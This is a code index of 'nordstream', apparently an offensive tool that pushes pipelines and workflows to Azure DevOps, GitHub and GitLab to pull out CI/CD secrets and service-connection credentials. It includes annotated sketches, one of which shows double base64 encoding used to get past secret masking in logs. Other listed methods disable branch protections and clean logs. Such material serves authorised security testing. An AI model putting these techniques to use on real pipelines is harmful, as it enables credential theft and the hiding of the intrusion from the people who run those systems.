method __launchPipeline (line 360) | def __launchPipeline(self, project, pipelineId, pipelineGenerator):
method __displayFailureReasons (line 403) | def __displayFailureReasons(self, projectId, runId):
method __extractVariableGroupsSecrets (line 408) | def __extractVariableGroupsSecrets(self, projectId, pipelineId):
method __extractSecureFiles (line 444) | def __extractSecureFiles(self, projectId, pipelineId):
method __extractGitHubSecrets (line 485) | def __extractGitHubSecrets(self, projectId, pipelineId, sc):
method __extractAzureRMSecrets (line 500) | def __extractAzureRMSecrets(self, projectId, pipelineId, sc):
method __extractAWSSecrets (line 519) | def __extractAWSSecrets(self, projectId, pipelineId, sc):
method __extractSonarSecrets (line 540) | def __extractSonarSecrets(self, projectId, pipelineId, sc):
method __extractSSHSecrets (line 555) | def __extractSSHSecrets(self, projectId, pipelineId, sc):
method __extractServiceConnectionsSecrets (line 570) | def __extractServiceConnectionsSecrets(self, projectId, pipelineId):
method manualCleanLogs (line 599) | def manualCleanLogs(self):
method __runSecretsExtractionPipeline (line 606) | def __runSecretsExtractionPipeline(self, projectId, pipelineId):
method __pushEmptyFile (line 622) | def __pushEmptyFile(self):
method __createRemoteRepo (line 645) | def __createRemoteRepo(self, projectId):
method __getRemoteRepo (line 654) | def __getRemoteRepo(self, projectId):
method __deleteRemoteBranch (line 665) | def __deleteRemoteBranch(self):
method __clean (line 676) | def __clean(self, projectId, repoId, deleteRemoteRepo, deleteRemotePip...
method __createPipeline (line 702) | def __createPipeline(self, projectId, repoId):
method __runCustomPipeline (line 716) | def __runCustomPipeline(self, projectId, pipelineId):
method runPipeline (line 729) | def runPipeline(self):
method describeToken (line 788) | def describeToken(self):
method __checkRunErrors (line 800) | def __checkRunErrors(self, run):
method parseExtractList (line 815) | def parseExtractList(self, extractList, allow=True):
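DevOpsRunner is the orchestration layer: it appears to push a pipeline definition to a temporary repository or branch, run it, download the logs and decode the secrets out of them (__extractPipelineOutput, __extractVariableGroupsSecrets, __extractServiceConnectionsSecrets, ...). The helper name __doubleb64 suggests the pipeline output is base64-encoded twice before being written to the job log, so the runner's secret masking never sees the literal value. A standalone sketch of that decoding step, not the project's actual implementation:

import base64


def decode_double_b64(output: str) -> str:
    """Decode a value that a pipeline step base64-encoded twice before echoing it.

    Encoding twice keeps the literal secret string out of the job log, so CI
    masking cannot redact it; the operator decodes it locally afterwards.
    Independent sketch of what a helper like __doubleb64() presumably does.
    """
    once = base64.b64decode(output)
    return base64.b64decode(once).decode("utf-8", errors="replace")


# The inverse operation a pipeline step would perform:
payload = base64.b64encode(base64.b64encode(b"MY_SECRET=value")).decode()
assert decode_double_b64(payload) == "MY_SECRET=value"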
FILE: nordstream/core/github/display.py
function displayRepoSecrets (line 6) | def displayRepoSecrets(secrets):
function displayDependabotRepoSecrets (line 13) | def displayDependabotRepoSecrets(secrets):
function displayEnvSecrets (line 20) | def displayEnvSecrets(env, secrets):
function displayOrgSecrets (line 27) | def displayOrgSecrets(secrets):
function displayDependabotOrgSecrets (line 34) | def displayDependabotOrgSecrets(secrets):
function displayEnvSecurity (line 41) | def displayEnvSecurity(envDetails):
function displayBranchProtectionRules (line 70) | def displayBranchProtectionRules(protections):
function displayRequiredStatusChecks (line 124) | def displayRequiredStatusChecks(data):
function displayRequiredPullRequestReviews (line 136) | def displayRequiredPullRequestReviews(data):
function displayRestrictions (line 175) | def displayRestrictions(data):
FILE: nordstream/core/github/github.py
class GitHubWorkflowRunner (line 23) | class GitHubWorkflowRunner:
method __init__ (line 46) | def __init__(self, cicd, env):
method extractRepo (line 52) | def extractRepo(self):
method extractRepo (line 56) | def extractRepo(self, value):
method extractEnv (line 60) | def extractEnv(self):
method extractEnv (line 64) | def extractEnv(self, value):
method extractOrg (line 68) | def extractOrg(self):
method extractOrg (line 72) | def extractOrg(self, value):
method workflowFilename (line 76) | def workflowFilename(self):
method workflowFilename (line 80) | def workflowFilename(self, value):
method yaml (line 84) | def yaml(self):
method yaml (line 88) | def yaml(self, value):
method exploitOIDC (line 92) | def exploitOIDC(self):
method exploitOIDC (line 96) | def exploitOIDC(self, value):
method tenantId (line 100) | def tenantId(self):
method tenantId (line 104) | def tenantId(self, value):
method subscriptionId (line 108) | def subscriptionId(self):
method subscriptionId (line 112) | def subscriptionId(self, value):
method clientId (line 116) | def clientId(self):
method clientId (line 120) | def clientId(self, value):
method role (line 124) | def role(self):
method role (line 128) | def role(self, value):
method region (line 132) | def region(self):
method region (line 136) | def region(self, value):
method disableProtections (line 140) | def disableProtections(self):
method disableProtections (line 144) | def disableProtections(self, value):
method writeAccessFilter (line 148) | def writeAccessFilter(self):
method writeAccessFilter (line 152) | def writeAccessFilter(self, value):
method branchAlreadyExists (line 156) | def branchAlreadyExists(self):
method branchAlreadyExists (line 160) | def branchAlreadyExists(self, value):
method pushedCommitsCount (line 164) | def pushedCommitsCount(self):
method pushedCommitsCount (line 168) | def pushedCommitsCount(self, value):
method forceDeploy (line 172) | def forceDeploy(self):
method forceDeploy (line 176) | def forceDeploy(self, value):
method cleanLogs (line 180) | def cleanLogs(self):
method cleanLogs (line 184) | def cleanLogs(self, value):
method __createLogDir (line 187) | def __createLogDir(self):
method __createWorkflowDir (line 192) | def __createWorkflowDir():
method __extractWorkflowOutput (line 195) | def __extractWorkflowOutput(self, repo):
method __extractSensitiveInformationFromWorkflowResult (line 200) | def __extractSensitiveInformationFromWorkflowResult(self, repo, inform...
method __getWorkflowOutputFileName (line 217) | def __getWorkflowOutputFileName(self, repo):
method __displayCustomWorkflowOutput (line 230) | def __displayCustomWorkflowOutput(self, repo):
method createYaml (line 240) | def createYaml(self, repo, workflowType):
method __extractSecretsFromRepo (line 271) | def __extractSecretsFromRepo(self, repo):
method __extractSecretsFromSingleEnv (line 299) | def __extractSecretsFromSingleEnv(self, repo, env):
method __extractSecretsFromAllEnv (line 320) | def __extractSecretsFromAllEnv(self, repo):
method __extractSecretsFromEnv (line 324) | def __extractSecretsFromEnv(self, repo):
method __generateAndLaunchWorkflow (line 330) | def __generateAndLaunchWorkflow(self, repo, workflowGenerator, outputN...
method __launchWorkflow (line 374) | def __launchWorkflow(self, repo, workflowGenerator):
method __postProcessingWorkflow (line 400) | def __postProcessingWorkflow(self, repo, workflowId, workflowConclusio...
method listGitHubRepos (line 419) | def listGitHubRepos(self):
method listGitHubSecrets (line 424) | def listGitHubSecrets(self):
method __displayRepoSecrets (line 441) | def __displayRepoSecrets(self, repo):
method __displayEnvSecrets (line 452) | def __displayEnvSecrets(self, repo):
method __displayOrgSecrets (line 468) | def __displayOrgSecrets(self, repo):
method __displayDependabotOrgSecrets (line 476) | def __displayDependabotOrgSecrets(self):
method getRepos (line 484) | def getRepos(self, repo):
method manualCleanLogs (line 511) | def manualCleanLogs(self):
method manualCleanBranchPolicy (line 516) | def manualCleanBranchPolicy(self):
method __runCustomWorkflow (line 521) | def __runCustomWorkflow(self, repo):
method __runOIDCTokenGenerationWorfklow (line 534) | def __runOIDCTokenGenerationWorfklow(self, repo):
method __runSecretsExtractionWorkflow (line 553) | def __runSecretsExtractionWorkflow(self, repo):
method __deleteRemoteBranch (line 560) | def __deleteRemoteBranch(self):
method __clean (line 571) | def __clean(self, repo, cleanRemoteLogs=True):
method start (line 596) | def start(self):
method __dispatchWorkflow (line 644) | def __dispatchWorkflow(self, repo):
method __checkAllEnvSecurity (line 652) | def __checkAllEnvSecurity(self, repo):
method __checkSingleEnvSecurity (line 662) | def __checkSingleEnvSecurity(self, repo, env):
method checkBranchProtections (line 666) | def checkBranchProtections(self):
method _checkBranchProtectionRules (line 705) | def _checkBranchProtectionRules(self, repo):
method __checkAndDisableBranchProtectionRules (line 732) | def __checkAndDisableBranchProtectionRules(self, repo):
method __checkAndGetBranchProtectionRules (line 766) | def __checkAndGetBranchProtectionRules(self, repo):
method __isEnvProtectionsEnabled (line 781) | def __isEnvProtectionsEnabled(self, repo, env):
method __disableEnvProtections (line 795) | def __disableEnvProtections(self, repo, envDetails):
method __restoreEnvProtections (line 826) | def __restoreEnvProtections(self, repo, env, policyId, waitTime, revie...
method describeToken (line 832) | def describeToken(self):
method __resetBranchProtectionRules (line 880) | def __resetBranchProtectionRules(self, repo, protections):
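GitHubWorkflowRunner drives the GitHub side end to end: property setters configure the run (target repo/env/org, OIDC parameters, writeAccessFilter, disableProtections, cleanLogs), workflow YAML is generated and pushed, and protections are optionally disabled and restored around the run. A hypothetical driver using only names listed above; the call sequence and argument semantics are assumptions of this sketch.

from nordstream.cicd.github import GitHub
from nordstream.core.github.github import GitHubWorkflowRunner


def run_secret_extraction(token, org, repo):
    """Hypothetical driver; the real CLI wiring lives in nordstream/commands/github.py."""
    gh = GitHub(token)
    gh.org = org                                 # `org` property setter per the index
    runner = GitHubWorkflowRunner(gh, env=None)  # __init__(self, cicd, env); env handling assumed
    runner.writeAccessFilter = True              # only keep repos the token can push to (assumed meaning)
    runner.disableProtections = False            # leave branch/environment protections untouched
    runner.getRepos(repo)                        # assumed to populate the target repository list
    runner.start()                               # launches the generated workflow(s)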
FILE: nordstream/core/github/protections.py
function resetRequiredStatusCheck (line 4) | def resetRequiredStatusCheck(protections):
function resetRequiredPullRequestReviews (line 22) | def resetRequiredPullRequestReviews(protections):
function resetRestrictions (line 71) | def resetRestrictions(protections):
function getUsersArray (line 87) | def getUsersArray(users):
function getTeamsOrAppsArray (line 94) | def getTeamsOrAppsArray(data):
FILE: nordstream/core/gitlab/gitlab.py
class GitLabRunner (line 15) | class GitLabRunner:
method writeAccessFilter (line 29) | def writeAccessFilter(self):
method writeAccessFilter (line 33) | def writeAccessFilter(self, value):
method extractProject (line 37) | def extractProject(self):
method extractProject (line 41) | def extractProject(self, value):
method extractGroup (line 45) | def extractGroup(self):
method extractGroup (line 49) | def extractGroup(self, value):
method extractInstance (line 53) | def extractInstance(self):
method extractInstance (line 57) | def extractInstance(self, value):
method yaml (line 61) | def yaml(self):
method yaml (line 65) | def yaml(self, value):
method branchAlreadyExists (line 69) | def branchAlreadyExists(self):
method branchAlreadyExists (line 73) | def branchAlreadyExists(self, value):
method cleanLogs (line 77) | def cleanLogs(self):
method cleanLogs (line 81) | def cleanLogs(self, value):
method sleepTime (line 85) | def sleepTime(self):
method sleepTime (line 89) | def sleepTime(self, value):
method localPath (line 93) | def localPath(self):
method localPath (line 97) | def localPath(self, value):
method __init__ (line 103) | def __init__(self, cicd):
method __createLogDir (line 107) | def __createLogDir(self):
method getProjects (line 111) | def getProjects(self, project, strict=False, membership=False):
method getGroups (line 136) | def getGroups(self, group):
method listGitLabRunners (line 154) | def listGitLabRunners(self):
method __mergeLists (line 164) | def __mergeLists(self, current, new, key):
method __mergeRunners (line 168) | def __mergeRunners(self, current, new):
method __listGitLabProjectRunners (line 181) | def __listGitLabProjectRunners(self):
method listGitLabSecrets (line 204) | def listGitLabSecrets(self):
method __listGitLabProjectSecrets (line 223) | def __listGitLabProjectSecrets(self):
method __listGitLabProjectSecureFiles (line 233) | def __listGitLabProjectSecureFiles(self):
method __listGitLabGroupSecrets (line 243) | def __listGitLabGroupSecrets(self):
method __listGitLabInstanceSecrets (line 253) | def __listGitLabInstanceSecrets(self):
method __displayProjectVariables (line 260) | def __displayProjectVariables(self, project):
method __displayProjectSecureFiles (line 295) | def __displayProjectSecureFiles(self, project):
method __displayGroupVariables (line 314) | def __displayGroupVariables(self, group):
method __displayInstanceVariables (line 335) | def __displayInstanceVariables(self):
method listGitLabProjects (line 352) | def listGitLabProjects(self):
method listGitLabUsers (line 365) | def listGitLabUsers(self):
method listGitLabGroups (line 382) | def listGitLabGroups(self):
method runPipeline (line 387) | def runPipeline(self):
method __runCustomPipeline (line 441) | def __runCustomPipeline(self, project):
method __launchPipeline (line 460) | def __launchPipeline(self, project, pipelineGenerator):
method __extractPipelineOutput (line 500) | def __extractPipelineOutput(self, project, resultsFilename="secrets.tx...
method __clean (line 514) | def __clean(self, project):
method manualCleanLogs (line 532) | def manualCleanLogs(self):
method __deleteRemoteBranch (line 538) | def __deleteRemoteBranch(self):
method describeToken (line 549) | def describeToken(self):
method listBranchesProtectionRules (line 575) | def listBranchesProtectionRules(self):
method __displayBranchesProtectionRulesPriv (line 597) | def __displayBranchesProtectionRulesPriv(self, protections):
method __displayBranchesProtectionRulesUnpriv (line 625) | def __displayBranchesProtectionRulesUnpriv(self, branches):
method __displayAccessLevel (line 643) | def __displayAccessLevel(self, access_levels):
method __displayFailureReasons (line 661) | def __displayFailureReasons(self, projectId, pipelineId):
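GitLabRunner mirrors the same orchestration for GitLab: enumerate projects and groups, list variables, secure files and runners, optionally launch a custom pipeline and pull its trace. A short hypothetical driver; only the names come from the index.

from nordstream.cicd.gitlab import GitLab
from nordstream.core.gitlab.gitlab import GitLabRunner


def list_gitlab_surface(url, token):
    """Hypothetical driver; None is assumed to mean 'all reachable projects/groups'."""
    gl = GitLab(url, token, True)
    runner = GitLabRunner(gl)      # __init__(self, cicd)
    runner.getProjects(None)
    runner.getGroups(None)
    runner.listGitLabSecrets()     # project/group/instance variables and secure files
    runner.listGitLabRunners()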
FILE: nordstream/git.py
class Git (line 11) | class Git:
method gitRunCommand (line 20) | def gitRunCommand(command):
method gitInitialization (line 33) | def gitInitialization(cls, branch, branchAlreadyExists=False):
method gitCleanRemote (line 52) | def gitCleanRemote(cls, branch, leaveOneFile=False):
method gitRemoteBranchExists (line 70) | def gitRemoteBranchExists(cls, branch):
method gitUndoLastPushedCommits (line 75) | def gitUndoLastPushedCommits(cls, branch, pushedCommitsCount):
method gitDeleteRemote (line 92) | def gitDeleteRemote(branch):
method gitPush (line 102) | def gitPush(cls, branch):
method gitCreateDummyFile (line 114) | def gitCreateDummyFile(cls, file):
method gitDiffFile (line 118) | def gitDiffFile(cls, file):
method gitMvFile (line 127) | def gitMvFile(cls, src, dest):
method gitCpFile (line 131) | def gitCpFile(cls, src, dest):
method gitCreateDir (line 135) | def gitCreateDir(cls, directory):
method gitClone (line 139) | def gitClone(url):
method gitGetCurrentBranch (line 156) | def gitGetCurrentBranch():
method gitIsGloalUserConfigured (line 169) | def gitIsGloalUserConfigured():
method gitIsGloalEmailConfigured (line 184) | def gitIsGloalEmailConfigured():
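The Git wrapper shells out to the local git binary for all repository operations (initialization, remote branch cleanup and deletion, pushing the generated pipeline or workflow file). An illustrative stand-in for the command-running helper, assuming the subprocess module shown in the file's imports; the real error handling and logging may differ.

import subprocess


def git_run_command(command):
    """Illustrative stand-in for Git.gitRunCommand(): run a git command quietly.

    Returns the process exit code; whether the real helper takes a shell string
    or an argument list is an assumption of this sketch.
    """
    result = subprocess.run(
        command,
        shell=True,
        stdout=subprocess.DEVNULL,
        stderr=subprocess.DEVNULL,
    )
    return result.returncode


# Example: pushing the tool's default branch (DEFAULT_BRANCH_NAME in
# nordstream/utils/constants.py is "dev_remote_ea5Eu/test/v1").
# git_run_command("git push origin dev_remote_ea5Eu/test/v1")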
FILE: nordstream/utils/devops.py
function listOrgs (line 5) | def listOrgs(token):
FILE: nordstream/utils/errors.py
class DevOpsError (line 1) | class DevOpsError(Exception):
class GitHubError (line 5) | class GitHubError(Exception):
class GitHubBadCredentials (line 9) | class GitHubBadCredentials(Exception):
class GitLabError (line 13) | class GitLabError(Exception):
class GitError (line 17) | class GitError(Exception):
class GitPushError (line 21) | class GitPushError(GitError):
class RepoCreationError (line 25) | class RepoCreationError(Exception):
FILE: nordstream/utils/helpers.py
function isHexadecimal (line 3) | def isHexadecimal(s):
function isGitLabSessionCookie (line 8) | def isGitLabSessionCookie(s):
function isAZDOBearerToken (line 12) | def isAZDOBearerToken(s):
function randomString (line 16) | def randomString(length):
function isAllowed (line 21) | def isAllowed(value, sclist, allow=True):
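The helpers are small utility functions. A hedged sketch consistent with the indexed names: isHexadecimal follows the hex-digit check visible in the file's source, while randomString is an assumed implementation; the token/cookie detectors are omitted because their heuristics are not shown here.

import random
import string


def isHexadecimal(s):
    # Every character must be a hexadecimal digit.
    hex_digits = set("0123456789abcdefABCDEF")
    return all(c in hex_digits for c in s)


def randomString(length):
    # Assumed implementation: an ASCII-letter string of the requested length,
    # e.g. for temporary file or branch names.
    return "".join(random.choice(string.ascii_letters) for _ in range(length))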
FILE: nordstream/utils/log.py
class WhitespaceStrippingConsole (line 15) | class WhitespaceStrippingConsole(Console):
method _render_buffer (line 16) | def _render_buffer(self, *args, **kwargs):
class NordStreamLog (line 22) | class NordStreamLog(logging.Logger):
method setVerbosity (line 28) | def setVerbosity(verbose: int, quiet: bool = False):
method debug (line 40) | def debug(self, msg: Any, *args: Any, **kwargs: Any) -> None:
method verbose (line 44) | def verbose(self, msg: Any, *args: Any, **kwargs: Any) -> None:
method raw (line 49) | def raw(
method info (line 69) | def info(self, msg: Any, *args: Any, **kwargs: Any) -> None:
method warning (line 73) | def warning(self, msg: Any, *args: Any, **kwargs: Any) -> None:
method error (line 79) | def error(self, msg: Any, *args: Any, **kwargs: Any) -> None:
method exception (line 83) | def exception(self, msg: Any, *args: Any, **kwargs: Any) -> None:
method critical (line 87) | def critical(self, msg: Any, *args: Any, **kwargs: Any) -> None:
method success (line 93) | def success(self, msg: Any, *args: Any, **kwargs: Any) -> None:
method empty_line (line 98) | def empty_line(self, log_level: int = logging.INFO) -> None:
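The logging module builds on rich and adds custom levels on top of logging.Logger (verbose() and success()) plus a setVerbosity() switch. The sketch below only illustrates the generic mechanism for registering one custom level with the standard logging module; it is not the project's implementation, which also handles colouring and whitespace stripping via WhitespaceStrippingConsole.

import logging

# Illustrative only: a "VERBOSE" level between DEBUG (10) and INFO (20).
VERBOSE = 15
logging.addLevelName(VERBOSE, "VERBOSE")


class SketchLogger(logging.Logger):
    def verbose(self, msg, *args, **kwargs):
        if self.isEnabledFor(VERBOSE):
            self._log(VERBOSE, msg, args, **kwargs)


logging.setLoggerClass(SketchLogger)
logging.basicConfig(level=VERBOSE)
logger = logging.getLogger("sketch")
logger.verbose("shown only when verbosity is raised")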
FILE: nordstream/yaml/custom.py
class CustomGenerator (line 6) | class CustomGenerator(YamlGeneratorBase):
method loadFile (line 7) | def loadFile(self, file):
method writeFile (line 17) | def writeFile(self, file):
method displayYaml (line 26) | def displayYaml(self):
FILE: nordstream/yaml/devops.py
class DevOpsPipelineGenerator (line 4) | class DevOpsPipelineGenerator(YamlGeneratorBase):
method _get_base_template (line 7) | def _get_base_template(self, poolName, os_type):
method _get_ps_b64_script (line 17) | def _get_ps_b64_script(self, fetch_logic):
method generatePipelineForSecretExtraction (line 28) | def generatePipelineForSecretExtraction(self, variableGroup, poolName=...
method generatePipelineForSecureFileExtraction (line 69) | def generatePipelineForSecureFileExtraction(self, secureFile, poolName...
method generatePipelineForAzureRm (line 93) | def generatePipelineForAzureRm(self, azureSubscription, poolName=None,...
method generatePipelineForGitHub (line 118) | def generatePipelineForGitHub(self, endpoint, poolName=None, os="linux"):
method generatePipelineForAWS (line 150) | def generatePipelineForAWS(self, awsCredentials, poolName=None, os="li...
method generatePipelineForSonar (line 176) | def generatePipelineForSonar(self, sonarSCName, poolName=None, os="lin...
method generatePipelineForSSH (line 204) | def generatePipelineForSSH(self, sshSCName, poolName=None, os="linux"):
FILE: nordstream/yaml/generator.py
class YamlGeneratorBase (line 6) | class YamlGeneratorBase:
method defaultTemplate (line 10) | def defaultTemplate(self):
method defaultTemplate (line 14) | def defaultTemplate(self, value):
method getEnvironnmentFromYaml (line 19) | def getEnvironnmentFromYaml(yamlFile):
method loadFile (line 29) | def loadFile(self, file):
method writeFile (line 39) | def writeFile(self, file):
method displayYaml (line 48) | def displayYaml(self):
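YamlGeneratorBase holds a default template and the load/modify/dump cycle that the DevOps, GitHub and GitLab generators build on. An independent illustration of that cycle with PyYAML (the project's yaml/generator.py imports yaml); the class and method bodies here are a sketch, not the project's code.

import yaml


class SketchYamlGenerator:
    """Independent illustration of a loadFile/writeFile/displayYaml cycle."""

    def __init__(self):
        self.defaultTemplate = {}

    def loadFile(self, file):
        with open(file) as f:
            self.defaultTemplate = yaml.safe_load(f)

    def writeFile(self, file):
        with open(file, "w") as f:
            yaml.dump(self.defaultTemplate, f, sort_keys=False)

    def displayYaml(self):
        print(yaml.dump(self.defaultTemplate, sort_keys=False))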
FILE: nordstream/yaml/github.py
class WorkflowGenerator (line 5) | class WorkflowGenerator(YamlGeneratorBase):
method generateWorkflowForSecretsExtraction (line 69) | def generateWorkflowForSecretsExtraction(self, secrets, env=None):
method generateWorkflowForOIDCAzureTokenGeneration (line 74) | def generateWorkflowForOIDCAzureTokenGeneration(self, tenant, subscrip...
method generateWorkflowForOIDCAWSTokenGeneration (line 81) | def generateWorkflowForOIDCAWSTokenGeneration(self, role, region, env=...
method addEnvToYaml (line 88) | def addEnvToYaml(self, env):
method getEnv (line 94) | def getEnv(self):
method addSecretsToYaml (line 100) | def addSecretsToYaml(self, secrets):
method addAzureInfoForOIDCToYaml (line 107) | def addAzureInfoForOIDCToYaml(self, tenant, subscription, client):
method addAWSInfoForOIDCToYaml (line 114) | def addAWSInfoForOIDCToYaml(self, role, region):
FILE: nordstream/yaml/gitlab.py
class GitLabPipelineGenerator (line 4) | class GitLabPipelineGenerator(YamlGeneratorBase):